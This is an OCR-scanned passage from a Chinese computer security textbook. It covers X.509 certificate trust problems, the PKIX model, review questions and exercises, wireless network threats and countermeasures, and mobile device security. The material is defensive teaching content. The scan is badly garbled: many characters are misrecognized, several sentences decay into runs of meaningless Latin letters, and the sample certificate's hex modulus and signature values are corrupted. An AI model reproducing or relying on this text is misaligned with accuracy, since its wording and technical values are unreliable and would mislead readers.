攻击 ， 这 写 致 了 黑客 为 多 个 知名 机 构 发 行 了 伪造 证 书 。 人 们 普遍 认为 是 伊朗 政府 在 其 许多 市 
民 的 安全 通信 中 实施 了 “中 间 人 攻击 ”( man-the-middle)。 这 导致 DigiNotar CA 密 钥 从 许多 系 
统 的 可 信和 存储 库 ( trust store) 中 被 移 除 ， 而 该 公司 随后 宣布 破产 。 男 一 个 名 为 Comodo 的 CA, 
在 2011 年 也 遭受 了 攻击 ,黑客 发 行 了 少量 的 伪造 证 书 。 

更 进一步 的 问题 是 由 于 不 同 的 实现 方法 导致 的 ， 因 为 不 同 的 Web 浏览 器 和 操作 系统 使 用 
不 同 的 “可 信和 存储 库 ”(trust store)， 因 此 为 用 户 呈 现 出 不 同 的 安全 视角 。 

由 于 所 给 出 的 这 些 问题 和 其 他 问题 ， 出 现 了 一 些 改善 X.509 证 书 实际 应 用 的 提案 。 其 中 一 
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些 建议 指出 ， 许 多 应 用 并 不 需要 将 已 验证 的 身份 与 公 钥 进行 正式 联合 (formal linking), fila, 
在 许多 Web 应 用 中 ， 所 有 的 用 户 实际 上 需要 知道 的 仅 是 他 们 是 否 访问 了 同一 个 安全 的 网 站 和 
是 否 为 访问 它 提供 了 证 书 ， 以 及 知道 他 们 所 访问 的 网 站 和 使 用 的 密码 是 否 与 其 之 前 访问 的 网 站 
和 使 用 的 密码 相同 。 就 类 似 于 ， 保 证 你 再 次 造访 同一 实体 商店 时 ， 看 到 了 与 之 前 见 到 过 的 同样 
的 名 称 、 同 样 的 布局 、 同 样 的 员工 。 更 进一步 ， 用 户 想 知道 这 就 是 如 同 其 他 用 户 在 其 他 地 点 看 
到 的 一 样 ， 是 同一 个 网 站 ， 使 用 同一 个 密 钥 。 

首先， 在 时 间 上 不 断 地 进行 确认 ， 这 可 由 用 户 应 用 提供 ， 因 为 用 户 应 用 拥有 其 访问 的 所 
有 网 站 的 证 书 细节 的 记录 ， 并 可 以 对 随后 访问 的 网 站 进行 检查 。 应 用 中 的 证 书 锁定 〈 certificate 
pinning) 能 够 提供 这 一 功能 ， 正 如 Google Chrome 所 使 用 的 。Firefox 的 “证 书 巡 查 ”(Certificate 
Patrol) 是 这 一 方法 的 男 一 个 例子 。 

其 次 ， 在 空间 上 不 断 地 进行 确认 ， 这 要 求 广泛 地 使 用 一 些 “ 网 络 公 证 服务 器 ”( network 
notary servers) 为 所 有 访问 的 网 站 保持 证 书记 录 ， 可 以 与 在 任何 情况 下 提供 给 用 户 的 证 书 进 
行 比较 。“ 展 望 项 目 ”( Perspectives Project) 就 是 这 一 方法 的 实际 应 用 ， 其 可 通过 Firefox 的 
“Perspective ”插件 进行 访问 。 这 也 验证 了 使 用 证 书 的 时 间 历 史 ， 因 此 为 这 一 方法 提供 期 望 的 
特征 。“ 谷 歌 证 书目 录 ” (Google Certificate Catalog) 和 “谷歌 证 书 透明 化 ” (Google Certificate 
Transparency) 项 目 是 公证 服务 硕 (notary server) 的 另外 一 些 例 子 。 

以 上 这 些 情 形 ， 识 别 其 他 时 间或 地 点 见 到 的 不 同 证 书 和 密 钥 ， 是 系统 被 攻击 或 有 其 他 问题 
的 象征 。 也 可 能 仅仅 是 由 于 证 书 将 失效 而 被 更 新 ,或 者 由 于 组 织 错误 地 为 相同 的 复制 服务 器 使 
用 了 多 个 证 书 和 密 钥 。 后 面 的 这 些 问题 需要 用 相应 的 扩展 进行 管理 。 


公 钥 基础 设施 X.509 


Internet 工程 任务 组 ( Internet Engineering Task Force, IETF) 公 钥 基础 设施 X.509 ( PKIX) 
工作 组 是 建立 一 个 基于 X.509 的 正式 4 和 一 般 的 ) 模型 的 背后 推动 力量 ， 这 个 模型 适 于 
在 Internet 上 部 署 基 于 证 书 的 基础 设施 。 本 节 介 绍 PKIX 模 型 。 更 多 详细 的 介绍 请 参见 
[STALI7]. 

图 23-4 展示 了 PKIX 模型 中 各 个 关键 
和 要素 间 的 相互 关系 。 这 些 要 素 包 括 需 要 颁 
发 证 书 的 端 实 体 (end entity) (例如 用 户 或 
RERS) 和 颁发 证 书 的 认证 中 心 (Certificate 
Authority, CA). CA 的 管理 功能 进一步 划分 
为 注册 中 心 (Registration Authority, RA), 
RA 主要 处 理 端 实体 和 CRL 颁发 者 (CRL 
issuer) 的 注册 以 及 管理 CRL 的 存储 库 
(repository ) 。 

PKIX 识别 许多 管理 功能 ， 这 些 功 能 可 
能 需要 管理 协议 来 文 持 。 图 23-4 前 明了 这 
个 过 程 ， 它 包括 如 下 要 素 : 用 户 注 册 、 密 
钥 资 料 的 初始 化 、CA 发 行 的 证 书 的 认证 、 
密 钥 对 恢复 和 更 新 、 证 书 的 撤销 申请 和 CA 
间 的 交 义 认证 。 图 23-4 PKIX 架构 模型 
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23.4 关键 术语 、 复 习题 和 习题 


关键 术语 


Authentication Server (AS， 认 证 服务 器 ) 
Certificate Authority (CA， 认 证 中 心 ) 

End entity ( 端 实 体 ) 

Kerberos realm (Kerberos 域 ) 

Public-Key Infrastructure (PKI， 公 钥 基 础 设施 ) 


复习 题 


23.1 一 个 Kerberos 系统 的 基本 要 素 是 什么 ? 
23.2 ”什么 是 Kerberos 域 ? 

23.3 Kerberos 版 本 4 和 版 本 5 有 什么 不 同 ? 
23.4 什么 是 X.509? 

23.5 X.509 证 书 中 包含 哪些 关键 要 素 ? 

23.6 CA 在 X.509 中 扮演 什么 样 的 角色 ? 
23.7 有 哪些 不 同类 型 的 XX.509 证 书 ? 


Registration Authority (RA ， 注 册 中 心 ) 
Ticket-Granting Ticket (TGT ， 票 据 授 予 票据 ) 
Ticket-Granting Server (TGS， 票 据 授 予 服 务 器 ) 
X.509 certificate (X.509 证 书 ) 


23.8 ”存在 哪些 替代 方案 用 于 检查 一 个 X.509 证 书 没有 被 吊销 ? 


23.9 ”什么 是 公 钥 基础 设施 ? 


23.10 ” 现 有 的 大 多 数 X.509 实现 ， 是 如 何 检查 证 书签 名 的 合法 性 的 ? 
23.11 现 有 的 公 钥 基础 设施 实现 中 的 一 些 主要 问题 是 什么 ? 


23.12 PH} PKIX 模型 的 关键 要 素 。 
习题 


23.1 ” 密 文 分 组 链接 (Cipher Block Chaining, CBC) 有 这 样 的 特性 ， 如 果 在 密 文 分 组 CT 传输 过 程 中 发 生 
一 个 错误 ， 那 么 这 个 错误 就 传递 ( propagate) 到 被 恢复 的 明文 分 组 PI 和 PI+1。Kerberos 版 本 4 使 
用 一 个 CBC 的 一 个 扩展 ， 叫 作 传 递 CBC (PCBC) 模式 。 这 个 模式 有 这 样 的 性 质 ， 在 一 个 密 文 分 
组 里 的 错误 被 传递 到 所 有 后 继 的 解密 消息 分 组 ， 致 使 每 个 分 组 都 是 无 效 的 。 因 此 数据 加 密 和 完整 
性 通过 一 个 操作 组 合 在 一 起 。 对 于 PCBC， 加 密 算法 的 输入 是 当前 的 明文 分 组 、 前 一 个 密 文 分 组 和 


前 一 个 明文 分 组 的 异 或 : 


C,=E(K, [Cri 中 Pet 中 Pal) 


在 解密 时 ， 每 个 密 文 组 通过 解密 算法 解密 。 输 出 与 前 一 个 密 文 分 组 以 及 前 一 个 明文 分 组 进行 异 或 。 
a. 画 一 个 和 第 20 章 中 相似 的 图 来 说 明 PCBC。 
b. 使 用 一 个 布尔 等 式 说 明 PCBC 的 工作 流程 。 


c. 说 明 一 个 在 密 文 分 组 中 的 随机 错误 是 如 何 被 传递 到 所 有 后 继 的 明文 分 组 的 。 


23.2 ”假设 在 PCBC 模式 下 , 块 Ci 和 Cil 在 传送 过 程 中 交换 了 。 请 证 明 其 影响 仅 涉及 解密 块 Pi 和 


Pi+1， 而 不 影响 后 续 块 。 
23.3 考虑 以 下 列 出 的 X.509 证 书 的 细节 。 


a. 辨认 X.509 证 书 中 的 关键 要 素 ， 包 括 所 有 者 的 名 称 和 公 钥 、 有 效 期 、 签 发 此 证 书 的 CA 名 称 、 


签名 的 类 型 和 值 。 


b. 说 明 它 是 一 个 CA 证 书 还 是 一 个 终端 用 户 证 书 ， 并 阐述 原因 。 


c. 说 明证 书 是 否 有 效 ， 并 阐述 原因 。 


d. 说 明 在 此 证 书 的 算法 的 运用 中 是 否 存 在 明显 的 问题 。 
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Certificate: 
Data: 
Version: 3 (0x2) 
Serial Number: 3c:50:33:c2:£8:e7:5c:ca:07:c2:4e:83:£2:e8:0e:4f 
Signature Algorithm: md5WithRSAEncryption 
Issuer: O=VeriSign, Inc., 
OU=VeriSign Trust Network, 
CN=VeriSign Class 1 CA Individual Persona Not Validated 
Validity 
Not Before: Jan 13 00:00:00 2000 GMT 
Not After : Mar 13 23:59:59 2000 GMT 
Subject: O=VeriSign, Inc., 
OU=VeriSign Trust Network, 
OU=Persona Not Validated, 
QU=Digital ID Class 1 - Netscape 
CN=John Doe/Email=john.doe@adfa.edu.au 
Subject Public Key Info: 
Public Key Algorithm: rsaEncryption 
RSA Public Key: (512 bit) 

Modulus (512 bit): 
00:98:£2:89:c4:48:e1:3b:2c:c5:d1:48:67:80:53: 
d8:eb:4d:4f:ac:31:a9:fd:11:68:94:ba:44:d8:48: 
46:0d:fc:5c:6d:89:47:3£:9£:d0:c0: 6d: 3e: 9a: 8e: 
ec:823521:48:9b3b9: 76: cfiaas09: 61:92:£6:dlscé: 
45:ca:ea:8f:df 

Exponent: 65537 (0x10001) 

X509v3 extensions: 
X509v3 Basic Constraints: 
CA: FALSE 
X509v3 Certificate Policies: 
Policy: 2.16.840.1,1139%33 La 
CPS: https://www.verisign.com/CPS 
X509v3 CRL Distribution Points: 
URI:http://crl.verisign.com/classl.crl 
Signature Algorithm: md5WithRSAEncryption 
Sarti: T7202: cez282:26:202:45:41sad: 11768 a0:f0 4es3.ce: 
Ja:ce:80:44:f4:a3:1la:72:43:e9:dc:el:la:9b:ec:64:f£7: ff: 
21:£2:29:89:d6:61:e5:39:bd:04:e7:e5:3d:7b:14:46:d6:eb: 
Sei 37  bOschs eat38 235381 Lf s40e57 s S788 raees 64 refe: 
$9360: 79:75: JasS4 2 473 Gas 372b256e: 23:6b: 57340362: 2E394: 
d3:aa:69:9d:3d:64:43:61:a7:a3:e0:b8:09:ac:94:9b:23:38: 
e8:1b:0f:e5:1lb:6e:e2: fa:32:86:£0:c4:0b:ed:89:d9:16:e4: 
al: 77 


23.4 用 你 的 浏览 器 访问 一 个 安全 网 站 (例如 ， 某 个 以 “https” 作 为 其 URL 开头 的 网 站 )， 检 查 此 网 站 使 
用 的 X.509 证 书 的 细节 。 这 通常 是 通过 选择 挂 锁 符 (padlock symbol) 进行 访问 ， 回 答 习 题 23.3 中 


涉及 的 同类 问题 。 


23.5 访问 你 的 浏览 器 所 使 用 的 信任 存储 库 (证 书 列表 )。 这 通常 是 通过 它 的 优先 级 设 定 实现 的 。 访 问 浏 
览 器 使 用 的 认证 中 心 证 书 ( Certificate Authority certificate) 列表 ， 选 取 其 中 一 个 并 检查 它 所 使 用 


的 义 .509 证 书 的 细节 。 回 答 习 题 23.3 中 涉及 的 同类 问题 。 
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无 线 网 络 安全 





学 习 目 标 
学 习 完 本 章 之 后 ， 你 应 该 能 够 : 
概述 无 线 网 络 的 安全 威胁 和 防护 措施 ; 
理解 组 织 网 络 中 使 用 移动 设备 面临 的 特有 的 安全 威胁 ; 


描述 移动 设备 安全 策略 的 主要 组 成 要 素 ; 
理解 [EEE 802.11 无 线 局 域 网 标准 的 基本 要 素 ; 
概括 IEEE 802.11i 无 线 局 域 网 安全 架构 的 各 种 组 件 。 





无 论 是 对 个 人 还 是 组 织 而 言 ， 基 于 无 线 网 络 和 通信 线路 的 通信 如 今 都 已 相当 普遍 。 无 线 通 
信 可 以 借 由 许多 不 同 的 技术 和 网 络 类 型 来 实现 ， 包 括 Wi-Fi、 蓝 牙 、WiMAX、ZigBee、 蜂 窝 技 
术 等 。 尽 管 本 书 前 面 所 讲述 的 安全 威胁 与 对 策 都 可 以 应 用 于 无 线 网 络 和 通信 线路 上 ， 但 针对 无 
线 环境 还 有 一 些 无 线 网 络 特有 的 安全 威胁 与 对 策 。 

本 章 首先 介绍 无 线 网 络 相 关 问 题 概况 。 然 后 ， 从 组 织 使 用 的 移动 设备 出 发 ， 集 中 讨论 移 
动 设备 安全 的 新 领域 。 接 下 来 ， 介 绍 无 线 网 络 安全 的 IEEE 802.111 标准 ， 这 个 标准 是 IEEE 
802.11 标准 的 一 部 分 ， 也 被 称 作 Wi-Fi。 我 们 从 概述 IEEE 802.11 标准 开始 ， 然 后 介绍 IEEE 
802.11i 标准 的 具体 细节 。 


24.1 无 线 安全 


无 线 网 络 和 使 用 无 线 网 络 的 无 线 设备 ， 引 出 了 许多 有 线 网 络 安全 问题 之 外 的 新 问题 。 相 比 
有 线 网 络 ， 导 致 无 线 网 络 安全 面临 更 高 威胁 的 一 些 关 键 因 素 有 [MA10]: 
e 信道 : 无 线 网 络 的 通信 方式 一 般 为 广播 通信 ， 比 有 线 网 络 更 容易 出 现 徊 听 和 拥堵 现象 - 
无 线 网 络 更 容易 遭受 利用 通信 协议 漏洞 的 主动 攻击 。 
e 移动 性 : 无 论 从 原理 还 是 从 实践 上 看 ， 无 线 设备 均 具 有 远 超过 有 线 设备 的 可 携带 、 可 
移动 性 。 这 一 特点 会 产生 更 多 的 安全 隐患 ， 下 文 将 会 讲述 。 
e 资源 : 一 些 无 线 设备 ， 例 如 智能 手机 和 平板 电脑 ， 其 操作 系统 比较 复杂 ， 而 设备 的 存 
储 资源 和 计算 资源 有 限 ， 这 种 情况 下 ， 可 能 会 面临 包括 拒绝 服务 攻击 和 恶意 代码 在 内 
的 安全 威胁 。 
e 可 访问 性 : 一 些 无 线 设 备 ， 例 如 传感器 和 机 器 人 ， 可 能 需要 在 无 人 值守 的 状态 下 被 留 
置 于 偏僻 或 敌 占 区 域 ， 这 就 增 大 了 其 遭受 物理 攻击 的 可 能 性 。 
简单 地 讲 ， 无 线 网 络 环境 有 三 个 容易 遭受 攻击 的 组 件 ( 见 图 24-1 )。 无 线 客户 端 ， 
一 般 为 手机 、 具 有 Wi-Fi 功能 的 笔记 本 电脑 或 平板 电脑 、 无 线 传感器、 蓝牙 设备 等 。 无 
线 接 人 点， 提供 了 到 网 络 或 服务 的 连接 ， 无 线 
接 入 点 可 以 是 手机 基站 、Wi-Fi 热点 和 接 人 有 线 
局 域 网 和 广域网 的 无 线 接 入 点 。 传 输 介质 ， 如 
用 于 数据 传输 的 无 线 电 波 ， 也 是 导致 脆弱 性 的 终端 


源头 之 一 。 图 24-1 无 线 网 络 的 组 成 
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24.1.1 无 线 网 络 威胁 


[CHOI08] 列举 了 如 下 无 线 网 络 面临 的 安全 威胁 : 

e 偶然 关联 : 企业 在 将 无 线 局 域 网 或 者 无 线 接 入 点 接 入 附近 位 置 的 有 线 局 域 网 (比如 同 
一 栋 建 筑 物 或 者 相 邻 的 建筑 物 ) 时 ， 可 能 产生 重 释 的 传输 覆盖 范围 。 当 用 户 试图 连接 
一 个 局 域 网 时 ， 可 能 不 小 心 自动 锁定 到 一 个 临近 网 络 的 无 线 接 入 点 。 这 种 安全 事故 是 
偶然 出 现 的 ， 然 而 却 会 将 局 域 网 内 的 资源 暴露 给 偶然 接 入 的 用 户 。 

e 恶意 关联 : 一 个 无 线 设备 能 够 配置 成 为 一 个 看 似 合 法 的 接 和 人 点， 使 得 操作 者 可 以 从 合 

法 用 户 禄 取 密 码 ， 然 后 操作 者 能 够 经 由 合法 的 无 线 接 和 人 点 渗透 到 有 线 网 络 中 。 

ad-hoc 网 络 : 这 些 是 点 对 点 网 络 ， 计 算 机 之 间 不 经 由 接 人 点 而 直接 相连 接 。 由 于 缺少 

控制 中 心 ， 这 种 网 络 容易 面临 一 定 的 安全 威胁 。 

非 传统 网 络 : 非 传统 网 络 和 连接 ， 比 如 个 人 网 络 蓝牙 设备 、 条 形 码 扫描 硕 、 手 持 PAD 

TE MRE Ba A hs E ER 

e 身份 盗用 (MAC 欺骗 ): WREE REKNA E, FPR IE PARI 

机 的 MAC 地 址 ， 就 会 发 生 号 份 盗用 。 

中 间 人 攻击 : 这 种 攻击 方法 在 第 21 章 Diffie-Hellman 密 钥 交换 协议 中 介绍 过 。 广 义 上 

说 ， 这 种 攻击 需要 使 用 户 和 接 入 点 双方 相信 他 们 互相 之 间 在 进行 直接 对 话 ， 而 实际 上 

通信 过 程 是 经 由 中 间 攻 击 设备 的 。 无 线 网 络 极 易 遭受 这 种 方式 的 攻击 。 

e 拒绝 服务 攻击 (DoS): 这 种 类 型 的 攻击 在 第 7 章 详细 讨论 过 。 在 无 线 网 络 的 场景 下 ， 
一 个 拒绝 服务 攻击 可 能 会 在 攻击 者 持续 不 断 地 以 各 种 协议 消息 索 炸 无 线 接 人 点 或 者 其 
他 可 访问 无 线 端口 的 情况 下 发 生 ， 以 达到 消耗 系统 资源 的 目的 。 无 线 环境 比 有 线 网 络 
更 容易 受到 这 种 方式 的 攻击 ， 因 为 攻击 者 很 容易 癌 攻 击 目 标 发 送 各 种 无 线 消息 。 

e 网 络 注 入 : 网 络 注 人 攻击 是 针对 无 线 接 入 点 对 网 络 流量 不 进行 过 滤 的 情况 ， 比 如 路 由 
协议 消息 或 网 络 管理 消息 。 例 如 ， 攻 击 者 通过 发 送 伪造 的 重新 配置 命令 来 影响 路 由 器 
和 交换 机 的 工作 ， 从 而 降低 整个 网 络 的 性 能 。 


24.1.2 无 线 安全 防护 措施 


依据 文献 [CHOI08]， 我 们 把 无 线 安全 防护 措施 分 为 三 类 ， 分 别 对 应 无 线 传 输 、 无 线 接 人 
点 和 无 线 网 络 (由 无 线路 由 和 端点 构成 )。 

安全 无 线 传输 ”无 线 传输 的 主要 威胁 是 镭 听 、 自 改 或 插入 消息 和 破坏 攻击 。 抵 御 穷 听 攻 击 
的 有 效 对 策 有 两 种 : 

e 信号 隐藏 技术 : 组 织 可 以 采取 多 种 措施 使 攻击 者 难以 定位 他 们 的 无 线 接 人 点 ， 例 如 关 

闭 无 线 接 入 点 的 服务 集 标识 符 ( SSID) 广播 ， 将 服务 集 标 识 符 (SSID) 设 为 隐秘 的 名 
称 ， 在 保证 必要 的 信和 号 覆盖 范围 的 前 提 下 减 小 信号 强度 ， 将 无 线 接 人 点 放置 在 远离 窗 
户 和 外 墙 的 建筑 物 内 部 。 此 外 ， 使 用 定向 天 线 和 信和 号 屏蔽 技术 可 以 达到 更 好 的 安全 防 
护 效果 。 

e WE: 在 保证 密 钥 安全 的 情况 下 ， 对 无 线 传 输 进行 加 密 可 以 有 效 地 抵御 窃听 攻击 。 

使 用 加 密 和 认证 协议 是 抵御 改变 或 插入 传输 攻击 的 一 种 标准 方法 。 

本 书 第 7 章 讨论 过 拒绝 服务 攻击 的 应 对 方法 ， 这 些 方法 也 可 以 应 用 到 无 线 传 输 中 来 。 与 此 
同时 ， 拥 有 无 线 网 络 的 组 织 也 可 以 采取 措施 以 减少 无 意 中 形 成 的 拒绝 服务 攻击 发 生 的 可 能 性 。 
实地 勘察 时 可 以 检测 到 当前 正在 使 用 同一 波段 范围 进行 通信 的 其 他 设备 ， 这 有 助 于 确定 无 线 接 
和 点 的 放置 位 置 。 通 过 调整 信号 强度 ， 进 行 适当 的 信和 号 屏蔽 ， 可 以 使 得 所 构建 的 无 线 环境 尽 可 
能 孤立 ， 避 免 其 他 无 线 信号 环境 的 干扰 。 


安全 无 线 接 入 点 ”无线 接 人 点 的 主要 威胁 是 网 络 的 非 认 证 访问 。 避 免 非 认 证 访问 的 主要 方 
式 是 采用 IEEE 802.1X 标准 协议 进行 网 络 访问 控制 。 该 标准 提供 了 一 种 认证 机 制 ， 用 于 对 试图 
连接 到 网 络 中 的 设备 进行 认证 。 采 用 802.1X 协议 能 够 避免 接 人 点 欺骗 和 阻止 其 他 非 授 权 设备 
成 为 不 安全 后 门 。 

24.3 节 介 绍 802.1X 协议 的 内 容 。 

安全 无 线 网 络 [CHOI08] 推荐 了 用 于 保证 无 线 网 络 安全 的 如 下 技术 : 

1. 使 用 加 密 技 术 。 无 线路 由 器 通常 内 置 加 密 机 制 以 加 密 路 由 之 间 的 通信 流量 。 

2. 使 用 反 病 毒 、 反 间谍 软件 和 防火 墙 。 这 些 软 件 应 该 部 署 在 所 有 无 线 网 络 终端 。 

3. 关 团 标识 符 广 播 。 无 线路 由 器 的 默认 设置 是 开局 标识 符 广 播 ， 一 定 范围 内 的 任何 设备 都 
能 够 检测 到 它 的 存在 。 关 闭 广播 之 后 ， 只 有 授权 设备 知道 该 路 由 器 的 标识 符 ， 攻 击 者 就 无 法 检 
测 路 由 天。 

4. 改变 路 由 需 的 标识 符 名 称 ， 不 使 用 默认 名 称 。 这 样 攻击 者 使 用 默认 标识 符 就 不 能 探测 到 
路 由 器 的 存在 。 

5. 改变 路 由 需 预 设 的 管理 员 密 码 。 这 也 是 一 个 明智 的 做 法 。 

6. 仅 允 许 指定 设备 接 人 到 无 线 网 络 。 路 由 器 可 以 设置 为 只 允许 连接 白 名 单 中 指定 的 MAC 
地 址 。 当 然 MAC 地 址 是 可 以 伪造 的 ， 所 以 这 只 是 安全 防御 策略 之 一 。 


24.2 移动 设备 安全 

在 智能 手机 广泛 应 用 之 前 ,一 织 的 计算 机 和 网 络 安全 的 典范 如 下 面 所 述 : ZAZA AY IT 
受到 严格 的 控制 ; pone ar = AA aca PC; 商业 应 用 程序 受到 IT 的 控制 ， dimmer 
nA his 47, BARGE UD NSAI 4h E3277. A ETE FT (A 2 AAA I fi 
Internet 之 间 定 义 明确 的 边界 来 保证 的 。 如 今 ， 这些 都 需要 做 出 改变 。 一 个 组 织 的 网 络 必 须 适 
应 如 下 和 情况: 

e 新 设备 的 不 断 增 加 : 如 今 的 组 织 正 在 面临 着 这 样 的 情况 一 一 员工 对 移动 设备 的 使 用 需 

求 不 断 增 长 。 许 多 情况 下 ,组织 允许 员工 结合 使 用 多 种 终端 设备 来 完成 日 常 工作 。 

e 基于 云 的 应 用 : 如 今 的 应 用 程序 已 不 仅 限于 在 孤立 的 数据 中 心 实体 服务 器 上 运行 了 。 
恰恰 相反 的 是 ， 应 用 程序 能 运行 在 任何 地 方 ， 如 传统 服务 器 、 移 动 虚拟 服务 器 或 是 云 
AR Ae. ISh, 终端 用 户 能 够 利用 各 式 各 样 基 于 云 的 应 用 和 IT 服务 来 满足 个 人 和 业 
务 的 需求 。 例 如 ， 社 交 应 用 Facebook 可 以 展示 员工 的 个 人 资料 或 是 组 织 市 场 活动 的 一 
部 分 ; 员工 使 用 网 络 通 信 工 具 Skype 与 海外 朋友 交谈 或 举行 正式 的 商业 视频 会 议 ; 使 
用 云 存储 应 用 Dropbox 和 Box 在 公司 设备 和 个 人 设备 上 发 布 文件 ， 能够 实现 移动 办 
公 ， 提 高 工作 效率 。 

e 去 边界 化 ( de-perimeterization) : 随 着 新 式 设备 的 增加 、 应 用 的 不 断 移动 化 以 及 基于 云 
的 个 人 使 用 者 和 企业 服务 的 增多 ， 静 态 网 络 边 界 的 概念 已 经 不 复 存 在 。 如 今 围绕 着 设 
备 、 应 用 、 用 户 、 数 据 有 众多 的 网 络 边 界 ， 这 些 边 界 也 变 得 动态 多 变 ， 以 适应 用 户 角 
色 、 设 备 类 型 、 pr iania 网 络 位 置 等 一 系列 环境 条 件 的 要 求 。 

e 外 部 业务 需求 : 组 织 必须 使 得 用 户 、 第 三 方 承 包 方 、 业 务 合作 伙伴 能 够 以 多 种 设备 从 
多 个 位 置 接 入 网 络 。 

所 有 这 些 变 化 中 首要 因素 是 移动 计算 设备 。 移 动 设备 作为 网 络 基础 设施 的 一 部 分 , 已 经 成 
为 组 织 的 基本 要 素 。 智 能 手机 、 平 板 电脑 、 存 储 卡 等 移动 设备 不 仅 方便 了 个 人 ， 同 时 也 大 大 提 
高 了 工作 效率 。 随 着 移动 设备 的 广泛 使 用 ， 其 特有 的 性 质 使 得 移动 设备 的 安全 问题 成 为 一 个 紧 
迫 而 复杂 的 问题 。 本 质 上 ,组 织 所 实现 的 安全 策略 ， 需 要 将 移动 设备 中 植 人 的 安全 特性 与 网 络 
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组 件 提供 的 、 用 于 规范 移动 设备 使 用 的 附加 安全 控制 结合 起 来 。 
24.2.1 安全 威胁 


除了 客户 端 其 他 设备 (如 仅 在 组 织 的 设施 上 和 网 络 上 使 用 的 桌面 系统 和 笔记 本 电脑 等 ) 所 
实施 的 安全 防护 措施 之 外 ， 移 动 设备 的 安全 防护 还 需要 附加 特定 的 保护 措施 。NIST SP 800-124 
(企业 移动 设备 安全 管理 指南 ，2013 年 6 月 ) 中 列举 了 关于 移动 设备 安全 主要 的 七 项 顾虑 。 下 
面 我 们 依次 对 其 进行 讨论 。 

物理 安全 控制 的 缺乏 移动 设备 通常 在 设备 使 用 者 的 完全 控制 之 下 ， 随 着 使 用 者 位 置 而 变 
化 ， 无 法 受到 组 织 的 控制 。 即 使 一 台 设备 被 要 求 限 定 在 组 织 的 物理 区 域内 使 用 ， 使 用 者 也 可 能 
在 组 织 区 域内 的 不 安全 位 置 使 用 该 设备 。 因 此 知 取 和 修改 安全 威胁 是 存在 的 。 

移动 设备 的 安全 策略 假设 任何 移动 设备 都 有 可 能 被 盗 取 或 者 被 恶意 攻击 者 访问 。 这 种 威胁 
是 双重 的 : 一 方面 攻击 者 可 能 尝试 恢复 移动 设备 中 的 敏感 数据 ; 男 一 方面 还 可 能 使 用 设备 获取 
组 织 资 源 的 访问 权限 。 

不 可 信 移 动 设备 的 使 用 ”除了 公司 配 发 或 控制 的 移动 设备 之 外 ， 员 工 们 往往 还 拥有 个 人 智 
能 手机 或 平板 电脑 。 组 织 必 须 假 设 这 些 个 人 设备 是 不 可 信 的 ， 也 就 是 说 ， 这 些 设备 可 能 没有 使 
用 数据 加 密 措 施 ， 且 其 使 用 者 或 某 个 第 三 方 可 能 在 设备 中 安装 了 某 种 旁 路 机 制 ， 用 于 绕 过 其 内 
部 安全 防护 限制 和 操作 系统 使 用 限制 等 。 

不 可 信和 网 络 的 使 用 如 果 移 动 设备 在 内 部 使 用 ， 可 以 通过 组 织 内 部 无 线 网 络 连 接 到 组 
织 内 部 资源 。 然 而 ， 在 组 织 外 部 使 用 移动 设备 时 ， 用 户 通 常 是 通过 Wi-Fi 或 蜂窝 网 络 ， 经 由 
Internet 访问 所 在 组 织 的 资源 。 了 这样， 通信 流量 就 可 能 容易 受到 和 欠 听 攻击 和 中 间 人 攻击 。 因 此 ， 
安全 策略 必须 假设 移动 设备 和 组 织 之 间 的 网 络 是 不 可 信 的 。 

不 可 信和 应 用 程序 的 使 用 在 移动 设备 上 查找 和 安装 第 三 方 应 用 程序 是 很 容易 的 ， 因 此 移动 
设备 具有 被 安装 恶意 软件 的 风险 。 对 于 此 类 威胁 ， 组 织 有 若干 应 对 方法 ， 下 文 将 会 具体 讲述 。 

与 其 他 系统 的 交互 ”智能 手机 和 平板 电脑 的 一 个 党 见 的 功能 是 将 设备 的 数据 、 应 用 程序 、 
联系 人 、 有 照片 等 自动 同步 到 其 他 计算 设备 和 云端 存储 上 。 除 非 一 个 组 织 具 有 所 有 涉及 的 设备 同 
步 机 制 的 控制 权限 ， 和 否则 同步 机 制 将 会 使 得 公司 内 部 数据 又 露 在 不 安全 的 网 络 中 ， 此 外 还 可 能 
将 恶意 程序 传播 到 组 织 内 部 。 

不 可 信和 内 容 的 使 用 ”移动 设备 会 访问 和 使 用 其 他 计算 设备 不 需要 的 内 容 。 比 如 快速 啊 应 码 
(QR code)， 它 是 二 维 码 的 一 种 。 知 移动 设备 的 摄像 头 扫 描 和 读 取 恶意 的 QR 数据 ， 将 其 翻译 为 
URL， 移 动 设 备 就 会 访问 到 该 URL 所 对 应 的 恶意 网 站 。 

位 置 服务 的 使 用 移动 设备 上 的 GPS 功能 可 以 被 用 于 维护 一 个 有 关 该 设备 的 地 理 位 置信 
息 。 当 这 一 特点 作为 组 织 在 线 服 务 的 一 部 分 时 ， 就 会 产生 安全 风险 。 通 过 GPS 数据 所 确定 该 
设备 和 使 用 者 的 实时 位 置信 息 可 能 会 被 攻击 者 利用 。 


24.2.2 ”移动 安全 策略 


鉴于 上 文 所 列举 的 安全 威胁 ， 我 们 把 移动 设备 安全 策略 的 主要 因素 归纳 为 三 类 ， 分 别 是 设 
BRE, BP Mit /服务 需 流量 安全 和 边界 安全 ( 见 图 24-2 )。 

设备 安全 一 些 组 织 为 安全 起 见 ， 给 员工 配备 预先 配置 好 的 移动 设备 。 然 而 ， 更 多 组 织 则 
SRM: 采用 “ 自 带 设备 ”( Bring-Your-Own-Device，BYOD) 这 一 安全 策略 ， 即 允许 员工 的 个 
人 设备 访问 组 织 内 部 资源 ， 更 为 方便 ， 甚 至 是 必要 的 。 在 这 种 策略 下 ，IT 管理 员 应 能 够 在 每 
台 设 备 获 得 网 络 访问 权限 之 前 对 其 进行 检查 。 此 外 ，fIT 部 门 要 发 布 操作 系统 和 应 用 程序 的 
配置 指南 。 例 如 ， 获 得 root 权限 或 已 “越狱 ”的 设备 不 允许 访问 网 络 ; 移动 设备 不 可 以 将 组 
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织 联系 人 及 其 联系 方式 存储 在 本 地 。 无 论 是 组 织 拥 有 的 设备 还 是 采用 BYOD 策略 下 的 个 人 设 
备 ， 组 织 都 应 该 为 设备 配置 安全 权限 ， 


讲 循 组 织 安全 策略 ， 
配置 移动 设备 安全 机 制 
和 参数 






流量 使 用 SSL 或 lf 
IPSec VPN 加 密 


利用 认证 和 访问 控制 






CE 
X 


协议 验证 设备 和 用 户 ， 
建立 访问 限制 
防火 墙 限制 数据 和 
应 用 程序 的 访问 范围 


图 24-2 移动 设备 安全 元 素 


e 文 持 自 动 锁定 。 当 设备 在 一 段 时 间 内 不 活动 时 ， 设 备 能 够 自动 锁定 ， 再 次 激活 设备 需 
